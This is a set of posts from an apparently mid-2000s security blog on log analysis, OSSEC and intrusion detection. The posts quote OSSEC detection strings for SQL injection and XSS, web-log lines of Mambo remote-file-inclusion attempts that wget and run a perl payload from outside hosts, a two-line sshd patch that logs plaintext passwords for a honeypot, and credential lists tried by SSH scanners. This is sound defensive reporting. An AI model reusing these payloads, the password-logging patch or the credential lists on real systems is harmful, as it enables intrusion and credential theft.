I know this is off-topic for this blog, but I can’t imagine why microsoft would want to build a partnership with Novell over Linux. I heard a comment that they are doing that just to cause troubles to the Oracle move to Linux… Comments?
More info here and here.
Author: Daniel Cid
bookmark_borderUsing sshv1 x sshv2
It has become common knowledge that everyone should use ssh version 2 and whenever possible disable support for version 1. The initial version of ssh has some design flaws that makes it vulnerable to some attacks (check out dsniff). However, I just read the following comment from Theo de Raadt at the OpenBSD misc list:
I am actually more worried about security problems in the protocol 2 code which is roughly 4-5x as complicated. People's fears are misplaced. But it is fun to ride a meme, isn't it.
I hope he is not encouraging people to use version 1…
bookmark_borderNIST guide to log management
I don’t need to say much more. The NIST guide to computer security log management is available here. On the bad side, even though they mention swatch, log parser and even the ancient logsentry, they forgot about ossec.
bookmark_borderCode 200: Good or Bad?
Anton Chuvakin commented in his blog about a mistake that most analysts make when monitoring their logs: they only care about errors or failures and forget about the sucessful entries. The comment was regarding to web logs, but it applies to all formats.
He also asked about how to separate the interesting (security relevant) sucessful entries to the normal ones (valid access). This was my reply:
I also think that sucessful attempts should be checked and taken in consideration…
For 200 (sucess) return codes, it is very hard to separate the “bad” from the “good”, specially on dynamic web sites. To try to solve this problem, on ossec, we built a list of strings that are most of the time bad on URLs. For example, for sql injections, we use the following combination:
=’|select%20|insert%20|%20from%20|%20where%20|union%20
For cross site scripting, we use:
%3Cscript|%2Fscript|script>|script%3E|SRC=javascript|IMG%20|%20ONLOAD=|INPUT%20
We also have more *patterns for specific attacks, common worms , etc.
Btw, I also think that this analysis must be done on web proxy logs too.
On ossec we use that on our squid rules and we can easily detect
infected internal systems by their http requests…
bookmark_borderLog analysis for intrusion detection
I just released the document Log analysis for Intrusion Detection at the ossec web site. It shows how some threats can be detected by correlating specific patterns on web logs, proxy logs and authentication logs..”
Log analysis is one of the most overlooked aspects of intrusion detection. Nowadays we see every desktop with an anti-virus, companies with multiple firewalls and even simple end-users buying the latest security related tools. However, who is watching or monitoring all the information these tools generate? Or even worse, who is watching your web server, mail server or authentication logs?”
bookmark_borderOSSEC presentation
Ahmet Ozturk, one of OSSEC developers, spoke about OSSEC (Capabilities, Architecture and plans) at the 5th Linux and Free Software Festival (Ankara / Turkey). His presentation in English is available bellow:
http://www.ossec.net/en/manual.html#othershttp://www.ossec.net/ossec-docs/ossec-hids_oahmet_eng.pdf
Good work Ahmet!
bookmark_borderHigh volume of web (mambo) scans.
Since Thursday night I’m seeing a high volume of scans
on different web servers for possibly the following vulns:
http://secunia.com/advisories/14337/http://www.osvdb.org/displayvuln.php?osvdb_id=10180
However, they say the problem is on function.php and I’m seeing them on index.php. Can anyone confirm that?
Some log samples below..
200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
These are just a few from 15:00 nd 17:00 pm yesterday.
Interesting is that they don’t do anything else, just
try to execute it and leave (without searching for
other paths)… Btw, I’m seeing these alerts from
ossec.
bookmark_borderInteresting information about SSH scans
I spent last week doing some research on the recently very active SSH scans and sent out the following e-mail to the incidents mailling list. Just some clarification before the e-mail itself:
1- My modified version of SSHD is very simple and I won’t plublish a diff. I basically just downloaded the last version from openssh.org and added these two lines on auth-passwd.c (on line 80 of the file — just after the beginning of the auth_password function):
if(strlen(password) > 1))
error(“user: %s, pass: %s”, authctxt->user, password);
2- Regarding the location of the scans, they look very
disperse (my boxes are in the US). I got two from Brazil,
one from the UK, one from NL, one from Japan, two from
India(from the same ISP), 2 from the USA and 1 from
Canada…
I set up some honeypots and also made a few modifications to the ssh daemon to print out the passwords these scans were trying to use. I noticed a reduction in the number of scans, but I still got a few in the last few days. Basically I noticed 2 different scans. ** Scan 1 - Attempt many passwords against the root account and a lot of attempts against common/default accounts (with the password being the same as the account name). Interesting is that some of the passwords for root doesn't look very simple and some use keyboard combinations (probably common too). Received scans of this type from 7 different IPS (same passwords, users, etc). ** Scan 2 - Attempt a lot of strange passwords against the root and admin account. Look bellow to see why I think they are strange. Looks like the scanner is broken :) Received scans of this type from 3 different IPS. *** User, password combinations: ** Scan 1 (user, password combinations): user root, pass: 1qaz2wsx user root, pass: 1q2w3e4r5t6y user root, pass: 1qaz2wsx3edc4rfv user root, pass: qazwsxedcrfv user root, pass: webmaster user root, pass: michael user root, pass: work user root, pass: maggie user root, pass: print user root, pass: 123456 user root, pass: root1234 user root, pass: 1qaz2wsx3edc user root, pass: qazwsxedc user root, pass: qazwsx user root, pass: internet user root, pass: mobile user root, pass: windows user root, pass: superman user root, pass: 1q2w3e4r user root, pass: network user root, pass: system user root, pass: administrator user root, pass: 123qwe user root, pass: manager user root, pass: redhat user root, pass: fedora user root, pass: okmnji user root, pass: qwerty user root, pass: httpd user root, pass: linux user root, pass: coder user root, pass: www user root, pass: 123123 user root, pass: 1234567890 user james, pass: james user cvs, pass: cvs user tony, pass: tony user bill, pass: bill user print, pass: print user maggie, pass: maggie user info, pass: info user http, pass: http user ftp, pass: ftp user dany, pass: dany user suse, pass: suse user oracle, pass: oracle user tomcat, pass: tomcat user backup, pass: backup user id, pass: id user sgi, pass: sgi user postgres, pass: postgres user flowers, pass: flowers user internet, pass: internet user linux, pass: linux user nokia, pass: nokia user bash, pass: bash user mysql, pass: mysql user webmaster, pass: webmaster ** Scan 2 (user, password combinations): These passwors look very strange... Does anyone will ever use a password of root1234567890? :) user root, pass: root12 user root, pass: root123 user root, pass: root1234 user root, pass: root12345 user root, pass: root123456 user root, pass: root1234567 user root, pass: root12345678 user root, pass: root123456789 user root, pass: root1234567890 user admin, pass: admin user admin, pass: admin1 user admin, pass: admin12 user admin, pass: admin123 user admin, pass: admin1234 user admin, pass: admin12345 user admin, pass: admin123456 user admin, pass: admin1234567 user admin, pass: admin12345678 user admin, pass: admin123456789 user admin, pass: admin1234567890
bookmark_borderNew blog
Since everyone now has a blog, I decided to create one to do not be left alone. 🙂
Actually, this is not the only reason why I am starting this. I plan to share some thoughts and information related to ossec, log analysis, HIDS and security in general.